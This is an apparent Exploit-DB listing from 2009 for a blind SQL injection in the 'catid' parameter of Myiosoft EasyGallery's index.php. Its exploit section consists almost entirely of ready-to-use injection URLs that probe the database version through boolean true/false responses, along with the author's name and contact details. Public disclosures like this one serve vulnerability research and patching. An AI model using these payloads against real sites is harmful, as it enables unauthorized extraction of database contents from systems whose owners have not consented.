Myiosoft EasyGallery (catid) Blind SQL Injection Vulnerability



EDB-ID: 10873 CVE: N/AOSVDB-ID: N/A
Author: Hussin XPublished: 2009-12-31Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
Myiosoft easygallery (catid)  Blind SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home :  www.IQ-TY.com<http://www.IQ-TY.com>
MaiL : darkangeL_G85@Yahoo.CoM
___________________________________
script  : http://myiosoft.com/?1.105.0.0
Exploit :
_______
true & false
http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=4  > false
http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=5  > true
end
  IQ-SecuritY FoRuM






Comments

No comments so far